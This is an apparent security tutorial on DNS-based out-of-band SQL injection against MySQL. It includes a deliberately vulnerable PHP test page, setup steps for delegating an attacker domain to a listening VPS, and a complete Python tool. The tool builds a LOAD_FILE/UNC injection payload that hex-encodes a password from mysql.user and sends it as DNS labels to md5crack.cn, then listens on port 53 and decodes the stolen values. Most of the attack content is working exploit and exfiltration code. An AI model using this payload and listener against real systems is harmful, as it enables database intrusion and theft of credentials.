DNS injection (out-of-band SQL injection over DNS) makes the database server perform a DNS lookup for a domain name that carries the data we want, so the value arrives at our own nameserver inside the query itself and we get the data quickly instead of guessing it.
Principle:
First, an overview diagram.
Usually, when an injection point has no data echo, we have to fall back on time-based (delayed) injection or Boolean-based blind injection. Both are very slow, have to pull the data out one character at a time, and easily bring the site down. So how do we get the data quickly? Below I explain the MySQL DNS injection steps in detail.
Things to prepare:
Two domain names, and one VPS (with sqlmap installed).
If you do not have CloudEye, there is a free alternative at http://ceye.io/ (a hosted DNS logging service, which saves you running your own nameserver).
First, take our first domain, md5crack.cn, and change its DNS servers.
Here I set the DNS (nameserver) of md5crack.cn to my second domain, Test.itgou.club, and then pointed Test.itgou.club at my own VPS's IP. After this, every DNS query for any name under md5crack.cn is delivered to the VPS, which is what lets us read the data out of the queried names.
Then wait for the DNS change to take effect (nameserver changes can take a while to propagate).
Then test it at a local injection point (inject.php) using the following code:

    <?php
    // Deliberately vulnerable test page: the user parameter is placed in the
    // query unescaped, and nothing is printed, so the injection has no echo.
    $link = mysql_connect("localhost", "root", "root");
    mysql_select_db("mysql", $link);
    $sql = "select password from user where user='{$_GET['user']}'";
    mysql_query($sql, $link);
As you can see, at this injection point there is no way to get the data other than time-based injection. With DNS injection, however, we do not need delays at all: the database resolves a hostname that carries the data, and we read it off the query that reaches our nameserver.
Then SSH into our VPS and go to sqlmap's sqlmap/lib/request/ directory.
There is a dns.py here. What is it for? It is the script sqlmap uses to listen on port 53 (the DNS port); run on its own it acts as a minimal DNS server that records the names queried, and we use it to receive the data.
Then we run this script so that it listens on port 53 (binding port 53 requires root).
Access Injection point: http://localhost/inject.php?user=root
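The attacker side of the procedure above, as an added example that is not code from the original article or from sqlmap: a Python payload builder that makes MySQL hex-encode the value, split it into 63-character DNS labels and look it up through LOAD_FILE on a UNC path, plus the parsing a port-53 listener performs on the query that arrives. The domain md5crack.cn is the article's; the subquery against mysql.user, the sample hash and the function names are assumptions for illustration. The caveat a practitioner needs: this trigger only fires when the MySQL server runs on Windows (the UNC path is what makes it resolve the hostname), and the database account needs the FILE privilege with a secure_file_priv setting that does not forbid LOAD_FILE.

```python
import socket
import struct

LABEL_MAX = 63  # RFC 1035 limit on one DNS label


def build_payload(subquery: str, domain: str, max_labels: int = 3) -> str:
    """SQL fragment injected after closing a single-quoted string value."""
    # HEX() keeps the value in the DNS-safe alphabet, SUBSTRING() (1-indexed)
    # cuts it into labels of at most 63 chars, and LOAD_FILE() on a UNC path
    # \\host\share forces the MySQL host to resolve "host". This only fires
    # when MySQL runs on Windows, with FILE privilege and a permissive
    # secure_file_priv. Hex literals 0x5c5c, 0x5c and 0x2e stand for the two
    # backslashes, one backslash and '.', so no quote escaping is needed.
    pieces = [
        f"SUBSTRING(HEX(({subquery})),{i * LABEL_MAX + 1},{LABEL_MAX})"
        for i in range(max_labels)
    ]
    # A short value leaves trailing empty labels ("AB..domain"), which is not
    # a valid hostname; TRIM drops the surplus dots before the domain goes on.
    host = f"TRIM(TRAILING '.' FROM CONCAT({',0x2e,'.join(pieces)}))"
    unc = f"CONCAT(0x5c5c,{host},0x2e,'{domain}',0x5c,'x')"
    return f"' AND LOAD_FILE({unc})-- -"


def simulate_mysql_labels(value: bytes, max_labels: int = 3) -> str:
    """Python equivalent of that HEX/SUBSTRING/TRIM expression: the host part
    MySQL would build. Anything past max_labels*63 hex chars is cut off,
    just as in the SQL, so longer values need more than one request."""
    h = value.hex().upper()
    chunks = [h[i:i + LABEL_MAX] for i in range(0, len(h), LABEL_MAX)]
    return ".".join(chunks[:max_labels])


def build_dns_query(qname: str, txid: int = 0x1234) -> bytes:
    """Standard A/IN query (RFC 1035 s4.1), standing in for the packet the
    MySQL host's resolver sends to our nameserver."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    question = b"".join(
        bytes([len(lbl)]) + lbl.encode("ascii")
        for lbl in qname.rstrip(".").split(".")
    )
    return header + question + b"\x00" + struct.pack(">HH", 1, 1)


def parse_dns_query(packet: bytes) -> str:
    """Queried name from a DNS query; every length byte is bounds-checked so
    a malformed packet raises ValueError instead of over-reading."""
    if len(packet) < 12 or struct.unpack(">H", packet[4:6])[0] != 1:
        raise ValueError("not a query with exactly one question")
    labels, pos = [], 12
    while True:
        if pos >= len(packet):
            raise ValueError("name runs past end of packet")
        length = packet[pos]
        if length == 0:
            break
        if length > LABEL_MAX:  # also rejects compression pointers (>= 0xC0)
            raise ValueError("bad label length")
        pos += 1
        if pos + length > len(packet):
            raise ValueError("label runs past end of packet")
        labels.append(packet[pos:pos + length].decode("ascii"))
        pos += length
    return ".".join(labels)


def decode_exfil(qname: str, domain: str) -> bytes:
    """Strip the attacker domain and hex-decode the remaining labels.
    Lower-casing tolerates resolvers that randomise query case."""
    suffix = "." + domain.lower()
    name = qname.lower().rstrip(".")
    if not name.endswith(suffix):
        raise ValueError(f"{qname!r} is not under {domain}")
    return bytes.fromhex(name[:-len(suffix)].replace(".", ""))


def listen(domain: str, port: int = 53) -> None:
    """UDP listener (binding 53 needs root). It sends no answer, unlike
    sqlmap's dns.py, so a retrying resolver may make a value appear twice."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("0.0.0.0", port))
    while True:
        packet, peer = sock.recvfrom(512)
        try:
            qname = parse_dns_query(packet)
            print(f"{peer[0]} queried {qname} -> {decode_exfil(qname, domain)!r}")
        except ValueError as exc:
            print(f"{peer[0]}: ignored ({exc})")


if __name__ == "__main__":
    DOMAIN = "md5crack.cn"  # the article's domain, delegated to the VPS
    print(build_payload("SELECT password FROM mysql.user LIMIT 1", DOMAIN))
    # Constructed sample: PASSWORD('root') in the old 41-char hash format.
    secret = b"*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B"
    qname = simulate_mysql_labels(secret) + "." + DOMAIN
    print(decode_exfil(parse_dns_query(build_dns_query(qname)), DOMAIN))
```

Run stand-alone it prints the payload to put in the user parameter and shows the round trip from a 41-character hash to DNS labels and back; on the VPS, listen(DOMAIN) plays the role the article gives to sqlmap's dns.py. The label splitting matters because HEX() doubles the length of the value, so even a single password hash does not fit in one 63-character label.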